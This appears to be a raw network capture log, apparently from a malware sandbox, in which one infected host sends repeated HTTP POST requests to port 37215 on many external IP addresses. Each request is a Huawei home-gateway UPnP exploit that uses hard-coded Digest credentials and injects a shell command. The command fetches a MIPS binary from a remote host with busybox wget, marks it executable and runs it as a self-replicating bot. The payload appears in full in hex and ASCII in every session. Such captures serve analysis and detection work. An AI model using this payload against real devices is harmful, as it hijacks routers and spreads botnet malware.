                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2074192.168.2.1336272150.228.254.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.703834057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2075192.168.2.1343498148.113.175.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.703856945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2076192.168.2.135798419.234.154.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.703886032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2077192.168.2.1343578157.240.224.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.704646111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2078192.168.2.1351582157.160.85.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.711205959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2079192.168.2.1360746101.234.13.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.711249113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2080192.168.2.1339922204.44.227.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.711810112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2081192.168.2.133454841.3.28.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.711891890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2082192.168.2.135182241.239.85.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.711893082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2083192.168.2.134373241.221.199.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.711910963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 